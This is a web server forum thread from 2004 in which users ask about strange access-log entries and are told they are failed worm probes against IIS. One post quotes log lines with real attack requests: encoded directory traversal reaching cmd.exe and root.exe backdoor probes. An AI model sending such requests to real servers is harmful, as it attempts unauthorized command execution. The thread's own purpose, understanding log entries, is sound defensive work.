What is fp30reg.dll ?

mg66 · - Joined: 15 Aug 2004 Posts: 85 Location: USA, Illinois

I found the following line in my access log ....

63.198.8.12 - - [20/Aug/2004:23:00:21 +11330] "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1" 404 234 "" ""

Is anyone able to explain what it is?
_________________
mg66

http://sv650.metromain.net
http://photography.metromain.net
http://weather.metromain.net
http://www.metromain.net
http://www.bghi.us

Abyss Web Server X2

TRUSTAbyss · - Joined: 29 Oct 2003 Posts: 3752 Location: USA, GA

Its a worm trying to hack into a IIS server lol , oh god thats funny
Dude , you have nothing to worry about , its a normal log file , see
the 404 part , that means its not found , have a nice day !

In the current beta you can choose what paths you can log , so you
can refuse to log requests from /_vti_bin/ , don't worry about it.

senshi · - Joined: 05 Nov 2003 Posts: 385 Location: UK

LMAO

Just hope the poor bloke didnt lose his bottle.

Drag0n · - Joined: 17 Feb 2004 Posts: 4

hmm i got something similar to those...
are these also for IIS?

68.189.78.164 - - [23/Aug/2004:10:53:13 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:14 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 876 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
68.189.78.164 - - [23/Aug/2004:10:53:15 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 868 "" ""
211.34.181.4 - - [22/Aug/2004:03:02:36 -0700] "GET /scripts/nsiislog.dll" 404 876 "" ""

TRUSTAbyss · - Joined: 29 Oct 2003 Posts: 3752 Location: USA, GA

Umm , yeah ! All of these are IIS attacks , in fact everything you see weird
in a log file is most likely an IIS attack , shows how much IIS sucks lol.